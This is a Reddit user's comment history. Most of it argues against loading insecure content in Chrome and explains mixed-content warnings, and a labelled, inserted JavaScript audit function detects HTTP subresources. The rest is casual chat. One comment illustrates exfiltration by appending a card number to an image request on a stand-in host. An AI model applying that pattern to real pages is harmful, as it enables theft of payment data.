da404lewzer

How do I allow pages with insecure content to load automatically? by fotc77 in chrome

[–]da404lewzer 1 point2 points ago

Please re-read everything that has been posted; this is serious stuff and not worth the risk. Google uses the phrase "Although not recommended.." because they literally don't recommend it. That feature is MOSTLY aimed at developers stuck in isolated testing environments. Do you think this feature would be turned off in a high-security setting like the CIA or FBI? Don't answer that...

How do I allow pages with insecure content to load automatically? by fotc77 in chrome

[–]da404lewzer 3 points4 points ago

Chrome is telling you there is a problem because there, well, IS a problem. A problem with Flickr.

Check for yourself.. go to http://www.whynopadlock.com and put in the URL: https://secure.flickr.com/

You'll notice that 12 of 37 items are insecure.

I have developed many web solutions that use both HTTP and HTTPS (example, you switch to HTTPS when logged in), neither of which are subject to this issue. The reason? I detect if you are in fact using HTTPS and adjust my content to use it as well. It's really not hard. Basically, Yahoo! needs to add an if statement somewhere that changes a variable from http:// to https://

Example (from Google Analytics):

```javascript
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-XXXXXXXX-1']);
_gaq.push(['_trackPageview']);
(function() {
  var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
  ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
  var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
```

Look closely at this bolded part:

```javascript
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
```

They check to see if it's an HTTPS request, and then set their base to the appropriate protocol, and in this case also a sub-domain.

Security standards are getting more and more demanding so it doesn't surprise me that Chrome would be the first to start being more strict about them.

There is also another problem with turning off the secure checks: while you are technically "fixing" the annoyance, you are now also opening the door to other websites to be able to bypass the restriction. I'm sure a lot of you view random sites, look at porn, and visit torrent sites.. all of which have been incubators for viruses and malware.
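The kind of check the comment above runs through WhyNoPadlock can be sketched as a small audit function. This is an added example, not part of the original comment and not WhyNoPadlock's code; the sample HTML, the `example.test` hosts and the function names are constructed for illustration, and the regex tag scan is a simplification of a real HTML parser.

```javascript
// Added example: list subresources an HTTPS page would fetch over plain HTTP.
// Tags whose URL attribute triggers a fetch (an <a href> is navigation, not a fetch).
const FETCHING = { img: 'src', script: 'src', iframe: 'src', audio: 'src',
                   video: 'src', source: 'src', embed: 'src', link: 'href', object: 'data' };
// Active content can rewrite the page; passive content cannot, but its request
// (URL and query string) still crosses the network unencrypted.
const ACTIVE = new Set(['script', 'iframe', 'link', 'embed', 'object']);

function auditMixedContent(pageUrl, html) {
  const page = new URL(pageUrl);
  const report = { total: 0, insecure: [] };
  if (page.protocol !== 'https:') return report; // an HTTP page has no padlock to lose
  const tagRe = /<([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    const attr = FETCHING[tag];
    if (!attr) continue;
    // <link> only fetches for some rel values; rel="canonical" is metadata.
    if (tag === 'link' && !/\brel\s*=\s*["']?[^"'>]*\b(?:stylesheet|icon)\b/i.test(m[2])) continue;
    // Match the exact attribute name, so data-src is not mistaken for src.
    const a = new RegExp('(?:^|\\s)' + attr + '\\s*=\\s*(?:"([^"]*)"|\'([^\']*)\'|([^\\s>]+))', 'i').exec(m[2]);
    if (!a) continue;
    let resolved;
    try { resolved = new URL(a[1] ?? a[2] ?? a[3], page); } catch { continue; }
    report.total += 1; // relative and protocol-relative URLs inherit https: from the page
    if (resolved.protocol === 'http:') {
      report.insecure.push({ tag, url: resolved.href, kind: ACTIVE.has(tag) ? 'active' : 'passive' });
    }
  }
  return report;
}

function summary(report) {
  return `${report.insecure.length} of ${report.total} items are insecure`;
}

// Constructed sample page, not taken from any real site.
const SAMPLE = `
<html><head>
<link rel="stylesheet" href="https://static.example.test/site.css">
<link rel="canonical" href="http://www.example.test/">
<script src="http://cdn.example.test/lib.js"></script>
<script src="//cdn.example.test/protocol-relative.js"></script>
</head><body>
<a href="http://other.example.test/">plain link</a>
<img src="http://img.example.test/logo.png">
<img src="/local/photo.jpg" data-src="http://img.example.test/lazy.jpg">
<img src='https://img.example.test/ok.png'>
</body></html>`;

console.log(summary(auditMixedContent('https://secure.example.test/', SAMPLE)));
```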

How do I allow pages with insecure content to load automatically? by fotc77 in chrome

[–]da404lewzer 3 points4 points ago

I really hope you aren't suggesting someone who's using the most secure browser on the planet to use: --allow-running-insecure-content

I am a web developer of 12 years, I strongly discourage this suggestion and recommend you just get used to clicking the allow button. Secondly, inform Flickr their site is acting up in Chrome. I'm sure they will get it fixed.. they only have ~50 million registered users...

How do I allow pages with insecure content to load automatically? by fotc77 in chrome

[–]da404lewzer 2 points3 points ago

No. Here's why:

An insecure page (aka, anything HTTP) can load in both insecure and secure content. From HTTP or HTTPS.

A secure page (aka, anything HTTPS) can only load in secure content.

You might wonder, why?

When you make a call to a site, let's say http://example.com/image.jpg, you are making a simple connection to a webserver, in this case example.com, and requesting /image.jpg (via a GET request).

So, why is this bad?

Using technologies like mod_rewrite for the Apache Webserver allows me to redirect "pretty urls" to scripts. And yes, it could match against any kind of file.

Now let's assume the page you're on gets breached and the hacker wants to forward your CC to his website. Because the page is HTTPS, it can't connect to HTTP without you allowing it. Once you allow it, the attacker takes a variable containing, let's say, your credit card number, and appends this to a simple .jpg request.

Something like: http://example.com/image.jpg?creditcardnumber=5454545454545454

Now, on the hacker's server, image.jpg is ACTUALLY a script that logs the submitted data to a DB and kicks out a static image to hide itself.

It's just too risky to ignore it. IE6 did and I'm pretty sure M$ is still kicking themselves in the ass for it...

Edit: I also forgot to mention that the main difference between HTTP and HTTPS is that all HTTPS traffic is encrypted before sending, and the server's identities are also verified.

How do I allow pages with insecure content to load automatically? by fotc77 in chrome

[–]da404lewzer 2 points3 points ago

Unfortunately it's not a bug.

The page is being loaded over HTTPS which means EVERYTHING on the page must also be pulled over HTTPS. WhyNoPadlock shows that there are a TON of images (including the logo) that are being pulled over standard HTTP.

Also, I'm not sure you will find an extension that will allow this behavior because it could be used by the wrong hands.

Check it yourself: http://www.whynopadlock.com/ (type in: https://secure.flickr.com/)

I Love You by Emperor_Tamarin in ForeverAlone

[–]da404lewzer 3 points4 points ago

You're doing God's work, have an upvote

Blink 182 Now & Then by JimboRSA in WTF

[–]da404lewzer 1 point2 points ago

I had to make this, sorry

"Oh, you!" - May it never die! by I_love_aminals in funny

[–]da404lewzer 0 points1 point ago

I saw it too, I love the idea :)

just started playing minecraft today by greenekid in Minecraft

[–]da404lewzer 1 point2 points ago

Awesome, you will have a ton of fun!

If you are looking to make friends you can jump on my server MegaBuilds.com later on, we also have teamspeak :)

Suddenly a white-board by zeb1 in funny

[–]da404lewzer -11 points-10 points ago

Jackie Chan and his stunt double by davvik in pics

[–]da404lewzer -2 points-1 points ago

Jelly?

Hold on... Just a second.... Oh.... by foreverk in funny

[–]da404lewzer 0 points1 point ago

Meanwhile, the passenger keeps putting on makeup.. zero fucks given

Why are sheep not the same color as their wool? by NomNuggetNom in Minecraft

[–]da404lewzer -7 points-6 points ago

Because you touch yourself at night...

I mispronounce words for fun. I just mispronounced an entire sentence at a coworker. by axilious in AdviceAnimals

[–]da404lewzer 17 points18 points ago

One day my mom was telling someone at work about some shoes she had gotten. When asked where she got them, she replied "Targé"

Apparently they spent the better part of that day trying to find it in town with no luck.. lol

And you're just a human! by Snakesballz in fffffffuuuuuuuuuuuu

[–]da404lewzer 1 point2 points ago

YES!! You win all my upvotes :)

And you're just a human! by Snakesballz in fffffffuuuuuuuuuuuu

[–]da404lewzer 0 points1 point ago

Exactly, I deeply miss some of my pets and reminisce about playing as a kid with them all the time, but I have to move on, and anytime I've heard/seen a pet death I just think to myself of all the good times and get back to it. I'm sure when my parents die I will be a mess and take off some time, but not over my dogs/cats...

And you're just a human! by Snakesballz in fffffffuuuuuuuuuuuu

[–]da404lewzer 1 point2 points ago

Actually, my logic makes perfect sense. I'm sorry you lost your childhood pet, I've lost several. You can't let it affect your life or guess what... you're gonna lose! And the back story of my friend is that he is constantly taking days off at work saying he's sick when he obviously isn't, and the fact that a couple personal days were used for his cat was almost the last straw. Companies can't afford to lose money or be liable for things when the root of the problem is a house cat. I don't think that makes my boss the bitch, I think it makes my friend the bitch.

And you're just a human! by Snakesballz in fffffffuuuuuuuuuuuu

[–]da404lewzer 5 points6 points ago

LOL, I suppose there will always be special cases..

Hell? by FlyingRabidUnicornPi in atheism

[–]da404lewzer 1 point2 points ago

Damned if you do, damned if you don't, I suppose...

And you're just a human! by Snakesballz in fffffffuuuuuuuuuuuu

[–]da404lewzer 5 points6 points ago

It seems your argument is more caught up on the animal-rights part of it, and not so much the "it's just a cat" side of it. Nobody here was saying, "kill cats because they aren't human", we're just saying if news about the death of your cat puts your life into a spiral, damn.

Example: I have a friend who almost lost his job because he took several days off to grieve over his cat's untimely death. It was completely ridiculous, like if he had lost a close family member or something...

That being said, I propose this question:

Let's say someone with a gun is threatening to kill either your cat or your mother, and you have to choose which one lives. If you don't choose it will be your mother. Negotiations aren't an option. Discuss...
